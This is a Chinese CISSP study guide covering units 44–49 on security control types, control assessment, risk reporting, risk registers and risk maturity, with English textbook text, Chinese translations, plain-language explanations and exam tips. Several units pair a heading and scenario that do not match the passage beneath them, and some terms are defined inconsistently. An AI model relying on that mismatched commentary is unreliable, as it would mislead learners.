资源和系统。 逻辑控制或技术控制的例子包括身份验证方法(如密码、智能 卡和生物识别)、加密、受限接口、访问控制列表、协议、防火墙、路由器 和入侵检测系统(IDS)。 物理 物理控制是专注于保护设施和现实世界物体的安全机制。 物理控制的示例包括 警卫、围栏、运动探测器、上锁的门、密封的窗户、照明、电缆保护、笔记本 电脑锁、徽章、刷卡、警犬、视频摄像头、访问控制 vestibule 和报警器。 适用的控制类型 术语 安全控制 指的是一类广泛的安全机制,其任务包括确保只有授权用户可 以登录,以及防止未经授权的用户访问资源。 这些控制措施可缓解多种信息 安全隐患。 在可能的情况下,您希望预防任何类型的安全问题或事件。 当然,这并不总 是可行的,不希望发生的事件仍会发生。 一旦发生,您希望尽快检测到这些 事件; 而在检测到事件后,您希望及时纠正。 在阅读控制描述时,请注意,有些控制被列为多种访问控制类型的示例。 例如, 围绕建筑物设置的围栏(或边界定义装置)既可以是预防性控制(物理上阻止 他人进入建筑区域),也可以是威慑性控制(阻止他人试图进入)。

预防性 一种预防性控制(又称预防性控制)用于阻止或制止 unwanted 或未经授权的 活动发生。 预防性控制的例子包括围栏、锁、身份验证、访问控制 vesti bules、报警系统、职责分离、岗位轮换、数据丢失防护(DLP)、渗透测试、 访问控制方法、加密、审计、安全策略、安全意识培训、反恶意软件软件、防 火墙和入侵防御系统(IPS)。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 44 / PDF P183

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Keep in mind that there are no perfect security mechanisms or controls. They all have issues that can allow a threat agent to still cause harm. Controls may have vulnerabilities, can be turned off, may be avoided, can be overloaded, may be bypassed, can be tricked by impersonation, may have backdoors, can be misconfigured, or have other issues. Thus, this known imperfection of individual security controls is addressed by using a defense-in-depth strategy. Detection A detection control (aka detective control) is deployed to discover or detect unwanted or unauthorized activity. Detection controls operate after the fact and can discover the activity only after it has occurred.

Examples of detection controls include security guards, motion detectors, recording and reviewing of events captured by security cameras or CCTV, job rotation, mandatory vacations, audit trails, honeypots or honeynets, intrusion detection systems (IDSs), violation reports, supervision and review of users, and incident investigations. Corrective A corrective control modifies the environment to return systems to normal after an unwanted or unauthorized activity has occurred. It attempts to correct any problems resulting from a security incident. Corrective controls can be simple, such as terminating malicious activity or rebooting a system.

They also include antimalware solutions that can remove or quarantine a virus, backup and restore plans to ensure that lost data can be restored, and intrusion prevention systems (IPSs) that can modify the environment to stop an attack in progress. The control is deployed to repair or restore resources, functions, and capabilities after a violation of security policies. Examples include installing a spring on a door so that it will close and relock, and using file integrity–checking tools, such as sigverif from Windows, which will replace corrupted boot files upon each boot event to protect the stability and security of the booted OS. Recovery

中文直译 / 整理

请记住,不存在完美的安全机制或控制措施。 它们都可能存在某些问题, 使威胁代理仍能造成损害。 控制措施可能存在漏洞,可能被关闭,可能被绕 过,可能被过载,可能被规避,可能因冒名顶替而被欺骗,可能有后门,可 能被错误配置,或存在其他问题。 因此,通过采用纵深防御策略来应对这些 已知的单个安全控制措施的不完善性。 检测 一种检测控制(又称侦探控制)用于发现或检测非预期或未经授权的活动。 检 测控制在事件发生后运作,只能在活动发生后才能发现它。 检测控制的示例包 括保安人员、运动探测器、由安全摄像头或闭路电视捕获事件的记录与回放、 岗位轮换、强制休假、审计跟踪、蜜罐或蜜网、入侵检测系统(IDS)、违规报 告、对用户的监督与审查,以及事件调查。 纠正 一种纠正控制会在发生非预期或未经授权的活动后,修改环境以使系统恢复正 常。 它旨在纠正由安全事件引发的任何问题。 纠正控制可以很简单,例如终止 恶意活动或重启系统。 它们还包括能够移除或隔离病毒的反恶意软件解决方案、 用于确保丢失数据可恢复的备份与恢复计划,以及能够修改环境以阻止正在进 行的攻击的入侵防御系统(IPS)。 该控制措施部署用于在违反安全策略后修 复或恢复资源、功能和能力。

示例包括在门上安装弹簧使其自动关闭并重新上 锁,以及使用文件完整性检查工具,例如来自Windows的sigverif,它将在每 次启动时替换损坏的引导文件,以保护已启动操作系统的稳定性和安全性。 恢复

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

纵深防御:纵深防御不是一道门,而是一层又一层控制。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

多层控制串联、避免单点失败,就是 defense in depth。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
纵深防御 纵深防御不是一道门,而是一层又一层控制。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
审计 审计检查控制是否存在、是否有效、是否符合要求。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 45 / PDF P184

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Recovery controls are an extension of corrective controls but have more advanced or complex abilities. A recovery control attempts to repair or restore resources, functions, and capabilities after a security policy violation. Recovery controls typically address more significant damaging events compared to corrective controls, especially when security violations may have occurred. Examples of recovery controls include backups and restores, faulttolerant drive systems, system imaging, server clustering, antimalware software, and database or virtual machine shadowing.

In relation to business continuity and disaster recovery, recovery controls can include hot, warm, and cold sites; alternate processing facilities; service bureaus; reciprocal agreements; cloud providers; rolling mobile operating centers; and multisite solutions. Deterrent A deterrent control is deployed to discourage security policy violations. Deterrent and preventive controls are similar, but deterrent controls often depend on individuals being convinced not to take an unwanted action. Some examples include policies, security-awareness training, locks, fences, security badges, guards, access control vestibules, and security cameras.

Directive A directive control is deployed to direct, confine, or control the actions of subjects to force or encourage compliance with security policies. Examples of directive controls include security policy requirements or criteria, posted notifications, guidance from a security guard, escape route exit signs, monitoring, supervision, and procedures. Compensating A compensating control (aka compensation control) is deployed to provide various options to other existing controls to aid in the enforcement and support of security policies. They can be any controls used in addition to, or in place of, another control.

They can be a means to improve the effectiveness of a primary control or as the alternate or failover option in the event of a primary control failure. For example, if a preventive control fails to stop the deletion of a file, a backup can be a compensating control, allowing for the restoration of that file. Here's another example: if a building's fire prevention and suppression systems fail and the building is damaged by fire so that it is not inhabitable, a compensating control would be having a disaster recovery

中文直译 / 整理

恢复控制是纠正控制的延伸,但具有更高级或更复杂的能力。 恢复控制旨在安 全策略被违反后修复或恢复资源、功能和能力。 与纠正控制相比,恢复控制通 常应对更严重的破坏性事件,尤其是在安全违规可能已经发生的情况下。 恢复 控制的示例包括备份与恢复、容错磁盘系统、系统镜像、服务器集群、反恶意 软件以及数据库或虚拟机影子复制。 在业务连续性和灾难恢复方面,恢复控制 可包括热站、温站和冷站; 备用处理设施; 服务提供商; 互惠协议; 云服务商; 移动运营中心; 以及多站点解决方案。 威慑 威慑控制用于阻止安全策略违规行为。 威慑控制与预防控制相似,但威慑控制 通常依赖于让个人信服不要采取不希望的行动。 一些示例包括政策、安全意识 培训、锁、围栏、安全徽章、保安、访问控制 vestibules 和安全摄像头。 指令 指令控制用于指导、限制或控制主体的行为,以强制或鼓励其遵守安全策略。 指令控制的示例包括安全政策要求或标准、张贴的通知、保安的指导、逃生路 线出口标志、监控、监督和程序。 补偿 一个补偿控制(又称补偿控制)被部署以提供多种选项,辅助其他现有控制措 施,以支持安全策略的执行。

它们可以是除其他控制措施之外使用,或替代其 他控制措施的任何控制措施。 它们可以用于提高主要控制措施的有效性,或在 主要控制措施失效时作为替代或备用选项。 例如,如果预防性控制未能阻止文 件被删除,备份就可以作为补偿控制,以恢复该文件。 另一个例子:如果建筑 物的防火和灭火系统失效,建筑物因火灾受损而无法居住,那么补偿控制就是 拥有一个灾难恢复

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 46 / PDF P185

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

plan (DRP) with an alternate processing site available to support work operations. Security Control Assessment A security control assessment (SCA) is the formal evaluation of a security infrastructure's individual mechanisms against a baseline or reliability expectation. The SCA can be performed in addition to or independently of a full security evaluation, such as a penetration test or vulnerability assessment. The goals of an SCA are to ensure the effectiveness of the security mechanisms, evaluate the quality and thoroughness of the risk management processes of the organization, and produce a report of the relative strengths and weaknesses of the deployed security infrastructure.

The results of an SCA may confirm that a security mechanism has sustained its previous level of verified effectiveness or that action must be taken to address a deficient security control. In addition to verifying the reliability of security controls, an assessment should consider whether security controls affect privacy. Some controls may improve privacy protection, whereas others may in fact cause a breach of privacy. The privacy aspect of a security control should be evaluated in light of regulations, contractual obligations, and the organization's privacy policy/promise. Generally, an SCA is a process implemented by federal agencies based on NIST SP 800-53 Rev.

5, titled “Security and Privacy Controls for Information Systems and Organizations.” However, though defined as a government process, the concept of evaluating the reliability and effectiveness of security controls should be adopted by every organization that is committed to sustaining a successful security endeavor. Monitoring and Measurement Security controls should provide benefits that can be continuously monitored and measured. If a security control's benefits cannot be quantified, evaluated, or compared, then it does not actually provide any security. A security control may provide native or internal monitoring, or external monitoring may be required.

You should take this into consideration when making initial countermeasure selections. Measuring the effectiveness of a countermeasure is not always an absolute value. Many countermeasures offer degrees of improvement rather than

中文直译 / 整理

计划(DRP),并配备一个备用处理站点以支持业务运作。 安全控制评估 一个安全控制评估(SCA)是对安全基础设施的各个机制相对于基线或可靠 性期望的正式评估。 SCA 可以在完整安全评估(如渗透测试或漏洞评估)之 外或独立进行。 SCA 的目标是确保安全机制的有效性,评估组织风险管理流程的质量和全面性, 并生成关于已部署安全基础设施相对优势与劣势的报告。 SCA 的结果可能证实 某个安全机制维持了其先前验证的有效性水平,也可能表明必须采取措施解决 有缺陷的安全控制。 除了验证安全控制的可靠性外,评估还应考虑安全控制是 否影响隐私。 某些控制措施可能增强隐私保护,而另一些则可能导致隐私泄露。 安全控制的隐私方面应根据法规、合同义务以及组织的隐私政策/承诺进行评估。 通常,SCA 是联邦机构根据 NIST SP 800‑53 Rev. 5《信息系统的安全与隐私 控制》实施的过程。 然而,尽管被定义为政府流程,但评估安全控制的可靠性 和有效性这一概念应被所有致力于维持成功安全工作的组织所采纳。 监控与测量 安全控制应提供可持续监控和测量的效益。 如果无法量化、评估或比较某项安 全控制的效益,则其实际上并未提供任何安全性。

安全控制可能提供原生或内 部监控,也可能需要外部监控。 在选择初步应对措施时,您应考虑这一点。 衡量一项对策的有效性并不总是绝对值。 许多对策提供的是一种改进程度,而不 是

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

渗透测试需要书面授权、范围和规则。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 47 / PDF P186

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

specific hard numbers as to the number of breaches prevented or attack attempts thwarted. Often to obtain countermeasure success or failure measurements, monitoring and recording of events both prior to and after safeguard installation are necessary. Benefits can only be accurately measured if the starting point (i.e., the normal point or initial risk level) is known. Part of the cost/benefit equation takes countermeasure monitoring and measurement into account. Just because a security control provides some level of increased security does not necessarily mean that the benefit gained is cost-effective.

A significant improvement in security should be identified to clearly justify the expense of a new countermeasure deployment. Risk Reporting and Documentation Risk reporting is a key task to perform at the conclusion of a risk analysis. Risk reporting involves the production of a risk report and a presentation of that report to the interested/relevant parties. For many organizations, risk reporting is an internal concern only, whereas other organizations may have regulations that mandate third-party or public reporting of their risk findings.

A risk report should be accurate, timely, comprehensive of the entire organization, clear and precise to support decision-making, and updated on a regular basis. Internal and external reporting in risk management are processes through which organizations communicate information about their risk-related activities, assessments, and strategies to different stakeholders. These two forms of reporting serve distinct purposes and audiences: Internal reporting in risk management is primarily intended for an organization's internal stakeholders, including executives, management, employees, and relevant departments.

The primary purpose is to support informed decision-making, risk mitigation, and the overall management of risks within the organization. Internal reports typically contain detailed information about the organization's risk assessments, risk exposures, risk control measures, and the effectiveness of risk management strategies. These reports may include risk registers, risk heat maps, key risk indicators (KRIs), and the results of risk assessments. External reporting in risk management is intended for external stakeholders, including regulatory bodies, shareholders, investors, creditors, customers, and the general public. The primary purpose is to

中文直译 / 整理

关于防止的入侵次数或 thwarted 的攻击尝试的具体硬性数字。 通常,要获得 对策成功或失败的度量,需要在防护措施安装前后对事件进行监控和记录。 只 有在已知起点(即正常点或初始风险水平)的情况下,才能准确衡量收益。 成 本/收益方程的一部分考虑了对策的监控和度量。 仅仅因为一项安全控制提供了 一定程度的安全提升,并不意味着所获得的收益具有成本效益。 必须明确识别 出显著的安全改进,以合理证明部署新对策的开支。 风险报告与文档 风险报告是风险分析结束时必须执行的关键任务。 风险报告涉及生成风险报告 并向相关利益方进行汇报。 对于许多组织而言,风险报告仅是内部事务; 而其 他组织可能受法规要求,必须向第三方或公众披露其风险发现。 风险报告应准 确、及时、全面涵盖整个组织,清晰精确以支持决策,并定期更新。 风险管理中的内部和外部报告是组织向不同利益相关者传达其风险相关活动、 评估和策略的过程。 这两种报告形式服务于不同的目的和受众: 内部报告在风险管理中主要面向组织的内部利益相关者,包括高管、管理 层、员工和相关部门。 其主要目的是支持知情决策、风险缓解以及组织内 部风险的总体管理。

内部报告通常包含有关组织风险评估、风险敞口、风 险控制措施以及风险管理策略有效性的详细信息。 这些报告可能包括风险 登记册、风险热力图、关键风险指标(KRIs)以及风险评估结果。 外部报告在风险管理中面向外部利益相关者,包括监管机构、股东、投 资者、债权人、客户和公众。 其主要目的是

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 48 / PDF P187

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

provide transparency and disclosure of an organization's risk profile, risk exposure, and risk management practices to external parties. External reports typically focus on high-level information about the organization's risk exposure, its policies and practices for risk management, and the potential impact of risks on the organization's financial health and operations. These reports may include annual reports, financial statements, disclosures in compliance with accounting standards, and regulatory filings. It's important for organizations to maintain a clear distinction between internal and external reporting in risk management.

Balancing these two forms of reporting is essential for effective risk management and maintaining transparency and trust with both internal and external audiences. A risk register or risk log is a document that inventories all the identified risks to an organization or system or within an individual project.

A risk register is used to record and track the activities of risk management, including the following: Identifying risks Evaluating the severity of and prioritizing those risks Prescribing responses to reduce or eliminate the risks Tracking the progress of risk mitigation A risk register can serve as a project management document to track completion of risk response activities as well as a historical record of risk management over time. The contents of a risk register could be shared with others to facilitate a more realistic evaluation of real-world threats and risks through the amalgamation of risk management activities by other organizations.

A risk matrix or risk heat map is a form of risk assessment that is performed on a basic graph or chart. It is sometimes labeled as a qualitative risk assessment. The simplest form of a risk matrix is a 3×3 grid comparing probability and damage potential. This was covered in Chapter 1. Continuous Improvement Risk analysis is performed to provide upper management with the details necessary to decide which risks should be mitigated, which should be

中文直译 / 整理

向外部方提供组织的风险概况、风险敞口和风险管理实践的透明度与披露。 外部报告通常聚焦于组织风险敞口的高层级信息、其风险管理政策与实践, 以及风险对组织财务状况和运营的潜在影响。 这些报告可能包括年度报告、 财务报表、符合会计准则的披露以及监管申报文件。 组织在风险管理中保持内部报告与外部报告之间的明确区分至关重要。 平衡这 两种报告形式对于有效风险管理以及向内外部受众保持透明度和信任至关重要。 风险登记册或风险日志是一个记录组织、系统或单个项目中所有已识别风 险的文档。 风险登记册用于记录和跟踪风险管理活动,包括以下内容: 识别风险 评估这些风险的严重性并确定其优先级 制定应对措施以减少或消除风险 跟踪风险缓解的进展 风险登记册可作为项目管理文档,用于跟踪风险应对活动的完成情况,同时 作为随着时间推移风险管理工作的历史记录。 风险登记册的内容可与他人共 享,通过整合其他组织的风险管理活动,促进对现实世界威胁和风险更真实 的评估。 一个 风险矩阵 或 风险热力图 是一种在基本图表或图形上进行的风险评估形式。 它有时被称为定性风险评估。 风险矩阵的最简单形式是 3×3 一个比较发生概率 和损害潜力的网格。

这在 第1章中已有介绍。 持续改进 风险分析旨在为高层管理提供必要的详细信息,以决定哪些风险应予以缓解, 哪些应

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 49 / PDF P188

安全职能与业务战略对齐

安全目标要服务业务目标,并受预算和资源限制。

教材原文段落

transferred, which should be deterred, which should be avoided, and which should be accepted. The result is a cost/benefit comparison between the expected cost of asset loss and the cost of deploying safeguards against threats and vulnerabilities. Risk analysis identifies risks, quantifies the impact of threats, and aids in budgeting for security. It helps integrate the needs and objectives of the security policy with the organization's business goals and intentions. The risk analysis/risk assessment is a “point-in-time” metric. Threats and vulnerabilities constantly change, and the risk assessment needs to be redone periodically in order to support continuous improvement.

Security is always changing. Thus, any implemented security solution requires updates and changes over time. If a continuous improvement path is not provided by a selected countermeasure, it should be replaced with one that offers scalable improvements to security. An enterprise risk management (ERM) program can be evaluated using the Risk Maturity Model (RMM). An RMM assesses the key indicators and activities of a mature, sustainable, and repeatable risk management process. There are several RMM systems, each prescribing various means to achieve greater risk management capability.

They generally relate the assessment of risk maturity against a five-level model (similar to that of the Capability Maturity Model [CMM]; see Chapter 20, “Software Development Security”). The typical RMM levels are as follows: 1. Ad hoc. A chaotic starting point from which all organizations initiate risk management. 2. Preliminary. Loose attempts are made to follow risk management processes, but each department may perform risk assessment uniquely. 3. Defined. A common or standardized risk framework is adopted organization-wide. 4. Integrated.

Risk management operations are integrated into business processes, metrics are used to gather effectiveness data, and risk is considered an element in business strategy decisions. 5. Optimized. Risk management focuses on achieving objectives rather than just reacting to external threats, increased strategic planning is geared toward business success rather than just avoiding incidents, and lessons learned are reintegrated into the risk management process.

中文直译 / 整理

转移、哪些应予以威慑、哪些应避免,以及哪些应予以接受。 其结果是对资 产损失的预期成本与部署防护措施应对威胁和脆弱性的成本之间的成本/效益 比较。 风险分析识别风险、量化威胁的影响,并协助制定安全预算。 它有助 于将安全策略的需求和目标与组织的业务目标和意图相整合。 风险分析/风险 评估是一种“时点”指标。 威胁和脆弱性不断变化,因此需要定期重新进行 风险评估,以支持持续改进。 安全始终在变化。 因此,任何已实施的安全解决方案都需要随着时间进行更新 和调整。 如果所选的应对措施未能提供持续改进的路径,则应将其替换为能够 提供可扩展安全改进的措施。 一个企业风险管理(ERM)计划可以通过风险成熟度模型(RMM)进行评估。 RMM评估成熟、可持续且可重复的风险管理过程的关键指标和活动。 存在多 种RMM系统,每种系统都规定了实现更高风险管理能力的不同方法。 它们通 常将风险成熟度的评估与五级模型相关联(类似于能力成熟度模型[CMM]; 参见第20章,“软件开发安全”)。 典型的RMM级别如下: 1. 临时性。 这是一种混乱的起点,所有组织都从此处启动风险管理。 2. 初步性。

尝试遵循风险管理流程,但各部门可能各自进行独特的风险评估。 3. 已定义。 整个组织采用通用或标准化的风险框架。 4. 集成化。 风险管理操作已融入业务流程中,使用指标收集有效性数据, 并将风险视为业务战略决策中的一个要素。 5. 优化。 风险管理侧重于实现目标,而不仅仅是应对外部威胁; 战略规划 更加注重业务成功,而不仅仅是避免事件; 并重新将经验教训整合到风险 管理流程中。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:安全目标要服务业务目标,并受预算和资源限制。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

业务战略对齐:安全要支持组织使命和目标,而不是单独追求技术完美。

战略计划:战略计划是长期、稳定、方向性的安全计划。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全职能与业务战略对齐”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

安全目标要与业务目标、预算、资源约束对齐。

Strategic 长期,Tactical 中期,Operational 短期日常。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
业务战略对齐 安全要支持组织使命和目标,而不是单独追求技术完美。
